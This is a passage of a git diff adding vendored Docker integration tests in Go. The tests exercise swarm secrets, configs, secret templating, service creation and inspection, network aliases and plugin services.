swarmtypes.SecretSpec{ + Annotations: swarmtypes.Annotations{ + Name: name, + Labels: labels, + }, + Data: data, + }) + assert.NilError(t, err) + assert.Check(t, secret.ID != "") + return secret.ID +} + +func TestSecretsCreateAndDelete(t *testing.T) { + skip.If(t, testEnv.DaemonInfo.OSType != "linux") + + defer setupTest(t)() + d := swarm.NewSwarm(t, testEnv) + defer d.Stop(t) + client := d.NewClientT(t) + defer client.Close() + ctx := context.Background() + + testName := "test_secret_" + t.Name() + secretID := createSecret(ctx, t, client, testName, []byte("TESTINGDATA"), nil) + + // create an already existin secret, daemon should return a status code of 409 + _, err := client.SecretCreate(ctx, swarmtypes.SecretSpec{ + Annotations: swarmtypes.Annotations{ + Name: testName, + }, + Data: []byte("TESTINGDATA"), + }) + assert.Check(t, is.ErrorContains(err, "already exists")) + + // Ported from original TestSecretsDelete + err = client.SecretRemove(ctx, secretID) + assert.NilError(t, err) + + _, _, err = client.SecretInspectWithRaw(ctx, secretID) + assert.Check(t, is.ErrorContains(err, "No such secret")) + + err = client.SecretRemove(ctx, "non-existin") + assert.Check(t, is.ErrorContains(err, "No such secret: non-existin")) + + // Ported from original TestSecretsCreteaWithLabels + testName = "test_secret_with_labels_" + t.Name() + secretID = createSecret(ctx, t, client, testName, []byte("TESTINGDATA"), map[string]string{ + "key1": "value1", + "key2": "value2", + }) + + insp, _, err := client.SecretInspectWithRaw(ctx, secretID) + assert.NilError(t, err) + assert.Check(t, is.Equal(insp.Spec.Name, testName)) + assert.Check(t, is.Equal(len(insp.Spec.Labels), 2)) + assert.Check(t, is.Equal(insp.Spec.Labels["key1"], "value1")) + assert.Check(t, is.Equal(insp.Spec.Labels["key2"], "value2")) +} + +func TestSecretsUpdate(t *testing.T) { + skip.If(t, testEnv.DaemonInfo.OSType != "linux") + + defer setupTest(t)() + d := swarm.NewSwarm(t, testEnv) + defer d.Stop(t) + client := 
d.NewClientT(t) + defer client.Close() + ctx := context.Background() + + testName := "test_secret_" + t.Name() + secretID := createSecret(ctx, t, client, testName, []byte("TESTINGDATA"), nil) + + insp, _, err := client.SecretInspectWithRaw(ctx, secretID) + assert.NilError(t, err) + assert.Check(t, is.Equal(insp.ID, secretID)) + + // test UpdateSecret with full ID + insp.Spec.Labels = map[string]string{"test": "test1"} + err = client.SecretUpdate(ctx, secretID, insp.Version, insp.Spec) + assert.NilError(t, err) + + insp, _, err = client.SecretInspectWithRaw(ctx, secretID) + assert.NilError(t, err) + assert.Check(t, is.Equal(insp.Spec.Labels["test"], "test1")) + + // test UpdateSecret with full name + insp.Spec.Labels = map[string]string{"test": "test2"} + err = client.SecretUpdate(ctx, testName, insp.Version, insp.Spec) + assert.NilError(t, err) + + insp, _, err = client.SecretInspectWithRaw(ctx, secretID) + assert.NilError(t, err) + assert.Check(t, is.Equal(insp.Spec.Labels["test"], "test2")) + + // test UpdateSecret with prefix ID + insp.Spec.Labels = map[string]string{"test": "test3"} + err = client.SecretUpdate(ctx, secretID[:1], insp.Version, insp.Spec) + assert.NilError(t, err) + + insp, _, err = client.SecretInspectWithRaw(ctx, secretID) + assert.NilError(t, err) + assert.Check(t, is.Equal(insp.Spec.Labels["test"], "test3")) + + // test UpdateSecret in updating Data which is not supported in daemon + // this test will produce an error in func UpdateSecret + insp.Spec.Data = []byte("TESTINGDATA2") + err = client.SecretUpdate(ctx, secretID, insp.Version, insp.Spec) + assert.Check(t, is.ErrorContains(err, "only updates to Labels are allowed")) +} + +func TestTemplatedSecret(t *testing.T) { + d := swarm.NewSwarm(t, testEnv) + defer d.Stop(t) + client := d.NewClientT(t) + defer client.Close() + ctx := context.Background() + + referencedSecretName := "referencedsecret_" + t.Name() + referencedSecretSpec := swarmtypes.SecretSpec{ + Annotations: 
swarmtypes.Annotations{ + Name: referencedSecretName, + }, + Data: []byte("this is a secret"), + } + referencedSecret, err := client.SecretCreate(ctx, referencedSecretSpec) + assert.Check(t, err) + + referencedConfigName := "referencedconfig_" + t.Name() + referencedConfigSpec := swarmtypes.ConfigSpec{ + Annotations: swarmtypes.Annotations{ + Name: referencedConfigName, + }, + Data: []byte("this is a config"), + } + referencedConfig, err := client.ConfigCreate(ctx, referencedConfigSpec) + assert.Check(t, err) + + templatedSecretName := "templated_secret_" + t.Name() + secretSpec := swarmtypes.SecretSpec{ + Annotations: swarmtypes.Annotations{ + Name: templatedSecretName, + }, + Templating: &swarmtypes.Driver{ + Name: "golang", + }, + Data: []byte("SERVICE_NAME={{.Service.Name}}\n" + + "{{secret \"referencedsecrettarget\"}}\n" + + "{{config \"referencedconfigtarget\"}}\n"), + } + + templatedSecret, err := client.SecretCreate(ctx, secretSpec) + assert.Check(t, err) + + serviceName := "svc_" + t.Name() + serviceID := swarm.CreateService(t, d, + swarm.ServiceWithSecret( + &swarmtypes.SecretReference{ + File: &swarmtypes.SecretReferenceFileTarget{ + Name: "templated_secret", + UID: "0", + GID: "0", + Mode: 0600, + }, + SecretID: templatedSecret.ID, + SecretName: templatedSecretName, + }, + ), + swarm.ServiceWithConfig( + &swarmtypes.ConfigReference{ + File: &swarmtypes.ConfigReferenceFileTarget{ + Name: "referencedconfigtarget", + UID: "0", + GID: "0", + Mode: 0600, + }, + ConfigID: referencedConfig.ID, + ConfigName: referencedConfigName, + }, + ), + swarm.ServiceWithSecret( + &swarmtypes.SecretReference{ + File: &swarmtypes.SecretReferenceFileTarget{ + Name: "referencedsecrettarget", + UID: "0", + GID: "0", + Mode: 0600, + }, + SecretID: referencedSecret.ID, + SecretName: referencedSecretName, + }, + ), + swarm.ServiceWithName(serviceName), + ) + + var tasks []swarmtypes.Task + waitAndAssert(t, 60*time.Second, func(t *testing.T) bool { + tasks = 
swarm.GetRunningTasks(t, d, serviceID) + return len(tasks) > 0 + }) + + task := tasks[0] + waitAndAssert(t, 60*time.Second, func(t *testing.T) bool { + if task.NodeID == "" || (task.Status.ContainerStatus == nil || task.Status.ContainerStatus.ContainerID == "") { + task, _, _ = client.TaskInspectWithRaw(context.Background(), task.ID) + } + return task.NodeID != "" && task.Status.ContainerStatus != nil && task.Status.ContainerStatus.ContainerID != "" + }) + + attach := swarm.ExecTask(t, d, task, types.ExecConfig{ + Cmd: []string{"/bin/cat", "/run/secrets/templated_secret"}, + AttachStdout: true, + AttachStderr: true, + }) + + expect := "SERVICE_NAME=" + serviceName + "\n" + + "this is a secret\n" + + "this is a config\n" + assertAttachedStream(t, attach, expect) + + attach = swarm.ExecTask(t, d, task, types.ExecConfig{ + Cmd: []string{"mount"}, + AttachStdout: true, + AttachStderr: true, + }) + assertAttachedStream(t, attach, "tmpfs on /run/secrets/templated_secret type tmpfs") +} + +func assertAttachedStream(t *testing.T, attach types.HijackedResponse, expect string) { + buf := bytes.NewBuffer(nil) + _, err := stdcopy.StdCopy(buf, buf, attach.Reader) + assert.NilError(t, err) + assert.Check(t, is.Contains(buf.String(), expect)) +} + +func waitAndAssert(t *testing.T, timeout time.Duration, f func(*testing.T) bool) { + t.Helper() + after := time.After(timeout) + for { + select { + case <-after: + t.Fatalf("timed out waiting for condition") + default: + } + if f(t) { + return + } + time.Sleep(100 * time.Millisecond) + } +} diff --git a/vendor/github.com/docker/docker/integration/service/create_test.go b/vendor/github.com/docker/docker/integration/service/create_test.go new file mode 100644 index 0000000000..a89ae0a172 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/service/create_test.go @@ -0,0 +1,374 @@ +package service // import "github.com/docker/docker/integration/service" + +import ( + "context" + "fmt" + "io/ioutil" + "testing" + "time" + + 
"github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + swarmtypes "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/client" + "github.com/docker/docker/integration/internal/network" + "github.com/docker/docker/integration/internal/swarm" + "github.com/docker/docker/internal/test/daemon" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/poll" +) + +func TestServiceCreateInit(t *testing.T) { + defer setupTest(t)() + t.Run("daemonInitDisabled", testServiceCreateInit(false)) + t.Run("daemonInitEnabled", testServiceCreateInit(true)) +} + +func testServiceCreateInit(daemonEnabled bool) func(t *testing.T) { + return func(t *testing.T) { + var ops = []func(*daemon.Daemon){} + + if daemonEnabled { + ops = append(ops, daemon.WithInit) + } + d := swarm.NewSwarm(t, testEnv, ops...) + defer d.Stop(t) + client := d.NewClientT(t) + defer client.Close() + + booleanTrue := true + booleanFalse := false + + serviceID := swarm.CreateService(t, d) + poll.WaitOn(t, serviceRunningTasksCount(client, serviceID, 1), swarm.ServicePoll) + i := inspectServiceContainer(t, client, serviceID) + // HostConfig.Init == nil means that it delegates to daemon configuration + assert.Check(t, i.HostConfig.Init == nil) + + serviceID = swarm.CreateService(t, d, swarm.ServiceWithInit(&booleanTrue)) + poll.WaitOn(t, serviceRunningTasksCount(client, serviceID, 1), swarm.ServicePoll) + i = inspectServiceContainer(t, client, serviceID) + assert.Check(t, is.Equal(true, *i.HostConfig.Init)) + + serviceID = swarm.CreateService(t, d, swarm.ServiceWithInit(&booleanFalse)) + poll.WaitOn(t, serviceRunningTasksCount(client, serviceID, 1), swarm.ServicePoll) + i = inspectServiceContainer(t, client, serviceID) + assert.Check(t, is.Equal(false, *i.HostConfig.Init)) + } +} + +func inspectServiceContainer(t *testing.T, client client.APIClient, serviceID string) types.ContainerJSON { + t.Helper() + filter := filters.NewArgs() + filter.Add("label", 
fmt.Sprintf("com.docker.swarm.service.id=%s", serviceID)) + containers, err := client.ContainerList(context.Background(), types.ContainerListOptions{Filters: filter}) + assert.NilError(t, err) + assert.Check(t, is.Len(containers, 1)) + + i, err := client.ContainerInspect(context.Background(), containers[0].ID) + assert.NilError(t, err) + return i +} + +func TestCreateServiceMultipleTimes(t *testing.T) { + defer setupTest(t)() + d := swarm.NewSwarm(t, testEnv) + defer d.Stop(t) + client := d.NewClientT(t) + defer client.Close() + + overlayName := "overlay1_" + t.Name() + overlayID := network.CreateNoError(t, context.Background(), client, overlayName, + network.WithCheckDuplicate(), + network.WithDriver("overlay"), + ) + + var instances uint64 = 4 + + serviceName := "TestService_" + t.Name() + serviceSpec := []swarm.ServiceSpecOpt{ + swarm.ServiceWithReplicas(instances), + swarm.ServiceWithName(serviceName), + swarm.ServiceWithNetwork(overlayName), + } + + serviceID := swarm.CreateService(t, d, serviceSpec...) + poll.WaitOn(t, serviceRunningTasksCount(client, serviceID, instances), swarm.ServicePoll) + + _, _, err := client.ServiceInspectWithRaw(context.Background(), serviceID, types.ServiceInspectOptions{}) + assert.NilError(t, err) + + err = client.ServiceRemove(context.Background(), serviceID) + assert.NilError(t, err) + + poll.WaitOn(t, serviceIsRemoved(client, serviceID), swarm.ServicePoll) + poll.WaitOn(t, noTasks(client), swarm.ServicePoll) + + serviceID2 := swarm.CreateService(t, d, serviceSpec...) 
+ poll.WaitOn(t, serviceRunningTasksCount(client, serviceID2, instances), swarm.ServicePoll) + + err = client.ServiceRemove(context.Background(), serviceID2) + assert.NilError(t, err) + + poll.WaitOn(t, serviceIsRemoved(client, serviceID2), swarm.ServicePoll) + poll.WaitOn(t, noTasks(client), swarm.ServicePoll) + + err = client.NetworkRemove(context.Background(), overlayID) + assert.NilError(t, err) + + poll.WaitOn(t, networkIsRemoved(client, overlayID), poll.WithTimeout(1*time.Minute), poll.WithDelay(10*time.Second)) +} + +func TestCreateWithDuplicateNetworkNames(t *testing.T) { + defer setupTest(t)() + d := swarm.NewSwarm(t, testEnv) + defer d.Stop(t) + client := d.NewClientT(t) + defer client.Close() + + name := "foo_" + t.Name() + n1 := network.CreateNoError(t, context.Background(), client, name, + network.WithDriver("bridge"), + ) + n2 := network.CreateNoError(t, context.Background(), client, name, + network.WithDriver("bridge"), + ) + + // Dupliates with name but with different driver + n3 := network.CreateNoError(t, context.Background(), client, name, + network.WithDriver("overlay"), + ) + + // Create Service with the same name + var instances uint64 = 1 + + serviceName := "top_" + t.Name() + serviceID := swarm.CreateService(t, d, + swarm.ServiceWithReplicas(instances), + swarm.ServiceWithName(serviceName), + swarm.ServiceWithNetwork(name), + ) + + poll.WaitOn(t, serviceRunningTasksCount(client, serviceID, instances), swarm.ServicePoll) + + resp, _, err := client.ServiceInspectWithRaw(context.Background(), serviceID, types.ServiceInspectOptions{}) + assert.NilError(t, err) + assert.Check(t, is.Equal(n3, resp.Spec.TaskTemplate.Networks[0].Target)) + + // Remove Service + err = client.ServiceRemove(context.Background(), serviceID) + assert.NilError(t, err) + + // Make sure task has been destroyed. 
+ poll.WaitOn(t, serviceIsRemoved(client, serviceID), swarm.ServicePoll) + + // Remove networks + err = client.NetworkRemove(context.Background(), n3) + assert.NilError(t, err) + + err = client.NetworkRemove(context.Background(), n2) + assert.NilError(t, err) + + err = client.NetworkRemove(context.Background(), n1) + assert.NilError(t, err) + + // Make sure networks have been destroyed. + poll.WaitOn(t, networkIsRemoved(client, n3), poll.WithTimeout(1*time.Minute), poll.WithDelay(10*time.Second)) + poll.WaitOn(t, networkIsRemoved(client, n2), poll.WithTimeout(1*time.Minute), poll.WithDelay(10*time.Second)) + poll.WaitOn(t, networkIsRemoved(client, n1), poll.WithTimeout(1*time.Minute), poll.WithDelay(10*time.Second)) +} + +func TestCreateServiceSecretFileMode(t *testing.T) { + defer setupTest(t)() + d := swarm.NewSwarm(t, testEnv) + defer d.Stop(t) + client := d.NewClientT(t) + defer client.Close() + + ctx := context.Background() + secretName := "TestSecret_" + t.Name() + secretResp, err := client.SecretCreate(ctx, swarmtypes.SecretSpec{ + Annotations: swarmtypes.Annotations{ + Name: secretName, + }, + Data: []byte("TESTSECRET"), + }) + assert.NilError(t, err) + + var instances uint64 = 1 + serviceName := "TestService_" + t.Name() + serviceID := swarm.CreateService(t, d, + swarm.ServiceWithReplicas(instances), + swarm.ServiceWithName(serviceName), + swarm.ServiceWithCommand([]string{"/bin/sh", "-c", "ls -l /etc/secret || /bin/top"}), + swarm.ServiceWithSecret(&swarmtypes.SecretReference{ + File: &swarmtypes.SecretReferenceFileTarget{ + Name: "/etc/secret", + UID: "0", + GID: "0", + Mode: 0777, + }, + SecretID: secretResp.ID, + SecretName: secretName, + }), + ) + + poll.WaitOn(t, serviceRunningTasksCount(client, serviceID, instances), swarm.ServicePoll) + + filter := filters.NewArgs() + filter.Add("service", serviceID) + tasks, err := client.TaskList(ctx, types.TaskListOptions{ + Filters: filter, + }) + assert.NilError(t, err) + assert.Check(t, is.Equal(len(tasks), 
1)) + + body, err := client.ContainerLogs(ctx, tasks[0].Status.ContainerStatus.ContainerID, types.ContainerLogsOptions{ + ShowStdout: true, + }) + assert.NilError(t, err) + defer body.Close() + + content, err := ioutil.ReadAll(body) + assert.NilError(t, err) + assert.Check(t, is.Contains(string(content), "-rwxrwxrwx")) + + err = client.ServiceRemove(ctx, serviceID) + assert.NilError(t, err) + + poll.WaitOn(t, serviceIsRemoved(client, serviceID), swarm.ServicePoll) + poll.WaitOn(t, noTasks(client), swarm.ServicePoll) + + err = client.SecretRemove(ctx, secretName) + assert.NilError(t, err) +} + +func TestCreateServiceConfigFileMode(t *testing.T) { + defer setupTest(t)() + d := swarm.NewSwarm(t, testEnv) + defer d.Stop(t) + client := d.NewClientT(t) + defer client.Close() + + ctx := context.Background() + configName := "TestConfig_" + t.Name() + configResp, err := client.ConfigCreate(ctx, swarmtypes.ConfigSpec{ + Annotations: swarmtypes.Annotations{ + Name: configName, + }, + Data: []byte("TESTCONFIG"), + }) + assert.NilError(t, err) + + var instances uint64 = 1 + serviceName := "TestService_" + t.Name() + serviceID := swarm.CreateService(t, d, + swarm.ServiceWithName(serviceName), + swarm.ServiceWithCommand([]string{"/bin/sh", "-c", "ls -l /etc/config || /bin/top"}), + swarm.ServiceWithReplicas(instances), + swarm.ServiceWithConfig(&swarmtypes.ConfigReference{ + File: &swarmtypes.ConfigReferenceFileTarget{ + Name: "/etc/config", + UID: "0", + GID: "0", + Mode: 0777, + }, + ConfigID: configResp.ID, + ConfigName: configName, + }), + ) + + poll.WaitOn(t, serviceRunningTasksCount(client, serviceID, instances)) + + filter := filters.NewArgs() + filter.Add("service", serviceID) + tasks, err := client.TaskList(ctx, types.TaskListOptions{ + Filters: filter, + }) + assert.NilError(t, err) + assert.Check(t, is.Equal(len(tasks), 1)) + + body, err := client.ContainerLogs(ctx, tasks[0].Status.ContainerStatus.ContainerID, types.ContainerLogsOptions{ + ShowStdout: true, + }) + 
assert.NilError(t, err) + defer body.Close() + + content, err := ioutil.ReadAll(body) + assert.NilError(t, err) + assert.Check(t, is.Contains(string(content), "-rwxrwxrwx")) + + err = client.ServiceRemove(ctx, serviceID) + assert.NilError(t, err) + + poll.WaitOn(t, serviceIsRemoved(client, serviceID)) + poll.WaitOn(t, noTasks(client)) + + err = client.ConfigRemove(ctx, configName) + assert.NilError(t, err) +} + +func serviceRunningTasksCount(client client.ServiceAPIClient, serviceID string, instances uint64) func(log poll.LogT) poll.Result { + return func(log poll.LogT) poll.Result { + filter := filters.NewArgs() + filter.Add("service", serviceID) + tasks, err := client.TaskList(context.Background(), types.TaskListOptions{ + Filters: filter, + }) + switch { + case err != nil: + return poll.Error(err) + case len(tasks) == int(instances): + for _, task := range tasks { + if task.Status.State != swarmtypes.TaskStateRunning { + return poll.Continue("waiting for tasks to enter run state") + } + } + return poll.Success() + default: + return poll.Continue("task count at %d waiting for %d", len(tasks), instances) + } + } +} + +func noTasks(client client.ServiceAPIClient) func(log poll.LogT) poll.Result { + return func(log poll.LogT) poll.Result { + filter := filters.NewArgs() + tasks, err := client.TaskList(context.Background(), types.TaskListOptions{ + Filters: filter, + }) + switch { + case err != nil: + return poll.Error(err) + case len(tasks) == 0: + return poll.Success() + default: + return poll.Continue("task count at %d waiting for 0", len(tasks)) + } + } +} + +func serviceIsRemoved(client client.ServiceAPIClient, serviceID string) func(log poll.LogT) poll.Result { + return func(log poll.LogT) poll.Result { + filter := filters.NewArgs() + filter.Add("service", serviceID) + _, err := client.TaskList(context.Background(), types.TaskListOptions{ + Filters: filter, + }) + if err == nil { + return poll.Continue("waiting for service %s to be deleted", serviceID) + } + 
return poll.Success() + } +} + +func networkIsRemoved(client client.NetworkAPIClient, networkID string) func(log poll.LogT) poll.Result { + return func(log poll.LogT) poll.Result { + _, err := client.NetworkInspect(context.Background(), networkID, types.NetworkInspectOptions{}) + if err == nil { + return poll.Continue("waiting for network %s to be removed", networkID) + } + return poll.Success() + } +} diff --git a/vendor/github.com/docker/docker/integration/service/inspect_test.go b/vendor/github.com/docker/docker/integration/service/inspect_test.go new file mode 100644 index 0000000000..daeabcfe12 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/service/inspect_test.go @@ -0,0 +1,153 @@ +package service // import "github.com/docker/docker/integration/service" + +import ( + "context" + "testing" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/filters" + swarmtypes "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/client" + "github.com/docker/docker/integration/internal/swarm" + "github.com/google/go-cmp/cmp" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/poll" + "gotest.tools/skip" +) + +func TestInspect(t *testing.T) { + skip.If(t, testEnv.IsRemoteDaemon()) + defer setupTest(t)() + d := swarm.NewSwarm(t, testEnv) + defer d.Stop(t) + client := d.NewClientT(t) + defer client.Close() + + var now = time.Now() + var instances uint64 = 2 + serviceSpec := fullSwarmServiceSpec("test-service-inspect", instances) + + ctx := context.Background() + resp, err := client.ServiceCreate(ctx, serviceSpec, types.ServiceCreateOptions{ + QueryRegistry: false, + }) + assert.NilError(t, err) + + id := resp.ID + poll.WaitOn(t, serviceContainerCount(client, id, instances)) + + service, _, err := client.ServiceInspectWithRaw(ctx, id, types.ServiceInspectOptions{}) + assert.NilError(t, err) + + expected := swarmtypes.Service{ + ID: id, + Spec: 
serviceSpec, + Meta: swarmtypes.Meta{ + Version: swarmtypes.Version{Index: uint64(11)}, + CreatedAt: now, + UpdatedAt: now, + }, + } + assert.Check(t, is.DeepEqual(service, expected, cmpServiceOpts())) +} + +// TODO: use helpers from gotest.tools/assert/opt when available +func cmpServiceOpts() cmp.Option { + const threshold = 20 * time.Second + + metaTimeFields := func(path cmp.Path) bool { + switch path.String() { + case "Meta.CreatedAt", "Meta.UpdatedAt": + return true + } + return false + } + withinThreshold := cmp.Comparer(func(x, y time.Time) bool { + delta := x.Sub(y) + return delta < threshold && delta > -threshold + }) + + return cmp.FilterPath(metaTimeFields, withinThreshold) +} + +func fullSwarmServiceSpec(name string, replicas uint64) swarmtypes.ServiceSpec { + restartDelay := 100 * time.Millisecond + maxAttempts := uint64(4) + + return swarmtypes.ServiceSpec{ + Annotations: swarmtypes.Annotations{ + Name: name, + Labels: map[string]string{ + "service-label": "service-label-value", + }, + }, + TaskTemplate: swarmtypes.TaskSpec{ + ContainerSpec: &swarmtypes.ContainerSpec{ + Image: "busybox:latest", + Labels: map[string]string{"container-label": "container-value"}, + Command: []string{"/bin/top"}, + Args: []string{"-u", "root"}, + Hostname: "hostname", + Env: []string{"envvar=envvalue"}, + Dir: "/work", + User: "root", + StopSignal: "SIGINT", + StopGracePeriod: &restartDelay, + Hosts: []string{"8.8.8.8 google"}, + DNSConfig: &swarmtypes.DNSConfig{ + Nameservers: []string{"8.8.8.8"}, + Search: []string{"somedomain"}, + }, + Isolation: container.IsolationDefault, + }, + RestartPolicy: &swarmtypes.RestartPolicy{ + Delay: &restartDelay, + Condition: swarmtypes.RestartPolicyConditionOnFailure, + MaxAttempts: &maxAttempts, + }, + Runtime: swarmtypes.RuntimeContainer, + }, + Mode: swarmtypes.ServiceMode{ + Replicated: &swarmtypes.ReplicatedService{ + Replicas: &replicas, + }, + }, + UpdateConfig: &swarmtypes.UpdateConfig{ + Parallelism: 2, + Delay: 200 * 
time.Second, + FailureAction: swarmtypes.UpdateFailureActionContinue, + Monitor: 2 * time.Second, + MaxFailureRatio: 0.2, + Order: swarmtypes.UpdateOrderStopFirst, + }, + RollbackConfig: &swarmtypes.UpdateConfig{ + Parallelism: 3, + Delay: 300 * time.Second, + FailureAction: swarmtypes.UpdateFailureActionPause, + Monitor: 3 * time.Second, + MaxFailureRatio: 0.3, + Order: swarmtypes.UpdateOrderStartFirst, + }, + } +} + +func serviceContainerCount(client client.ServiceAPIClient, id string, count uint64) func(log poll.LogT) poll.Result { + return func(log poll.LogT) poll.Result { + filter := filters.NewArgs() + filter.Add("service", id) + tasks, err := client.TaskList(context.Background(), types.TaskListOptions{ + Filters: filter, + }) + switch { + case err != nil: + return poll.Error(err) + case len(tasks) == int(count): + return poll.Success() + default: + return poll.Continue("task count at %d waiting for %d", len(tasks), count) + } + } +} diff --git a/vendor/github.com/docker/docker/integration/service/main_test.go b/vendor/github.com/docker/docker/integration/service/main_test.go new file mode 100644 index 0000000000..28fd19df4d --- /dev/null +++ b/vendor/github.com/docker/docker/integration/service/main_test.go @@ -0,0 +1,33 @@ +package service // import "github.com/docker/docker/integration/service" + +import ( + "fmt" + "os" + "testing" + + "github.com/docker/docker/internal/test/environment" +) + +var testEnv *environment.Execution + +func TestMain(m *testing.M) { + var err error + testEnv, err = environment.New() + if err != nil { + fmt.Println(err) + os.Exit(1) + } + err = environment.EnsureFrozenImagesLinux(testEnv) + if err != nil { + fmt.Println(err) + os.Exit(1) + } + + testEnv.Print() + os.Exit(m.Run()) +} + +func setupTest(t *testing.T) func() { + environment.ProtectAll(t, testEnv) + return func() { testEnv.Clean(t) } +} diff --git a/vendor/github.com/docker/docker/integration/service/network_test.go 
b/vendor/github.com/docker/docker/integration/service/network_test.go new file mode 100644 index 0000000000..4ebbd972a8 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/service/network_test.go @@ -0,0 +1,75 @@ +package service // import "github.com/docker/docker/integration/service" + +import ( + "context" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/network" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/integration/internal/swarm" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestDockerNetworkConnectAlias(t *testing.T) { + defer setupTest(t)() + d := swarm.NewSwarm(t, testEnv) + defer d.Stop(t) + client := d.NewClientT(t) + defer client.Close() + ctx := context.Background() + + name := t.Name() + "test-alias" + _, err := client.NetworkCreate(ctx, name, types.NetworkCreate{ + Driver: "overlay", + Attachable: true, + }) + assert.NilError(t, err) + + cID1 := container.Create(t, ctx, client, func(c *container.TestContainerConfig) { + c.NetworkingConfig = &network.NetworkingConfig{ + EndpointsConfig: map[string]*network.EndpointSettings{ + name: {}, + }, + } + }) + + err = client.NetworkConnect(ctx, name, cID1, &network.EndpointSettings{ + Aliases: []string{ + "aaa", + }, + }) + assert.NilError(t, err) + + err = client.ContainerStart(ctx, cID1, types.ContainerStartOptions{}) + assert.NilError(t, err) + + ng1, err := client.ContainerInspect(ctx, cID1) + assert.NilError(t, err) + assert.Check(t, is.Equal(len(ng1.NetworkSettings.Networks[name].Aliases), 2)) + assert.Check(t, is.Equal(ng1.NetworkSettings.Networks[name].Aliases[0], "aaa")) + + cID2 := container.Create(t, ctx, client, func(c *container.TestContainerConfig) { + c.NetworkingConfig = &network.NetworkingConfig{ + EndpointsConfig: map[string]*network.EndpointSettings{ + name: {}, + }, + } + }) + + err = client.NetworkConnect(ctx, name, cID2, &network.EndpointSettings{ + Aliases: []string{ + 
"bbb", + }, + }) + assert.NilError(t, err) + + err = client.ContainerStart(ctx, cID2, types.ContainerStartOptions{}) + assert.NilError(t, err) + + ng2, err := client.ContainerInspect(ctx, cID2) + assert.NilError(t, err) + assert.Check(t, is.Equal(len(ng2.NetworkSettings.Networks[name].Aliases), 2)) + assert.Check(t, is.Equal(ng2.NetworkSettings.Networks[name].Aliases[0], "bbb")) +} diff --git a/vendor/github.com/docker/docker/integration/service/plugin_test.go b/vendor/github.com/docker/docker/integration/service/plugin_test.go new file mode 100644 index 0000000000..6c61825220 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/service/plugin_test.go @@ -0,0 +1,121 @@ +package service + +import ( + "context" + "io" + "io/ioutil" + "os" + "path" + "testing" + + "github.com/docker/docker/api/types" + swarmtypes "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/api/types/swarm/runtime" + "github.com/docker/docker/integration/internal/swarm" + "github.com/docker/docker/internal/test/daemon" + "github.com/docker/docker/internal/test/fixtures/plugin" + "github.com/docker/docker/internal/test/registry" + "gotest.tools/assert" + "gotest.tools/poll" + "gotest.tools/skip" +) + +func TestServicePlugin(t *testing.T) { + skip.If(t, testEnv.IsRemoteDaemon, "cannot run daemon when remote daemon") + skip.If(t, testEnv.DaemonInfo.OSType == "windows") + skip.If(t, os.Getenv("DOCKER_ENGINE_GOARCH") != "amd64") + defer setupTest(t)() + + reg := registry.NewV2(t) + defer reg.Close() + + repo := path.Join(registry.DefaultURL, "swarm", "test:v1") + repo2 := path.Join(registry.DefaultURL, "swarm", "test:v2") + name := "test" + + d := daemon.New(t) + d.StartWithBusybox(t) + apiclient := d.NewClientT(t) + err := plugin.Create(context.Background(), apiclient, repo) + assert.NilError(t, err) + r, err := apiclient.PluginPush(context.Background(), repo, "") + assert.NilError(t, err) + _, err = io.Copy(ioutil.Discard, r) + assert.NilError(t, err) + err = 
apiclient.PluginRemove(context.Background(), repo, types.PluginRemoveOptions{}) + assert.NilError(t, err) + err = plugin.Create(context.Background(), apiclient, repo2) + assert.NilError(t, err) + r, err = apiclient.PluginPush(context.Background(), repo2, "") + assert.NilError(t, err) + _, err = io.Copy(ioutil.Discard, r) + assert.NilError(t, err) + err = apiclient.PluginRemove(context.Background(), repo2, types.PluginRemoveOptions{}) + assert.NilError(t, err) + d.Stop(t) + + d1 := swarm.NewSwarm(t, testEnv, daemon.WithExperimental) + defer d1.Stop(t) + d2 := daemon.New(t, daemon.WithExperimental, daemon.WithSwarmPort(daemon.DefaultSwarmPort+1)) + d2.StartAndSwarmJoin(t, d1, true) + defer d2.Stop(t) + d3 := daemon.New(t, daemon.WithExperimental, daemon.WithSwarmPort(daemon.DefaultSwarmPort+2)) + d3.StartAndSwarmJoin(t, d1, false) + defer d3.Stop(t) + + id := d1.CreateService(t, makePlugin(repo, name, nil)) + poll.WaitOn(t, d1.PluginIsRunning(name), swarm.ServicePoll) + poll.WaitOn(t, d2.PluginIsRunning(name), swarm.ServicePoll) + poll.WaitOn(t, d3.PluginIsRunning(name), swarm.ServicePoll) + + service := d1.GetService(t, id) + d1.UpdateService(t, service, makePlugin(repo2, name, nil)) + poll.WaitOn(t, d1.PluginReferenceIs(name, repo2), swarm.ServicePoll) + poll.WaitOn(t, d2.PluginReferenceIs(name, repo2), swarm.ServicePoll) + poll.WaitOn(t, d3.PluginReferenceIs(name, repo2), swarm.ServicePoll) + poll.WaitOn(t, d1.PluginIsRunning(name), swarm.ServicePoll) + poll.WaitOn(t, d2.PluginIsRunning(name), swarm.ServicePoll) + poll.WaitOn(t, d3.PluginIsRunning(name), swarm.ServicePoll) + + d1.RemoveService(t, id) + poll.WaitOn(t, d1.PluginIsNotPresent(name), swarm.ServicePoll) + poll.WaitOn(t, d2.PluginIsNotPresent(name), swarm.ServicePoll) + poll.WaitOn(t, d3.PluginIsNotPresent(name), swarm.ServicePoll) + + // constrain to managers only + id = d1.CreateService(t, makePlugin(repo, name, []string{"node.role==manager"})) + poll.WaitOn(t, d1.PluginIsRunning(name), 
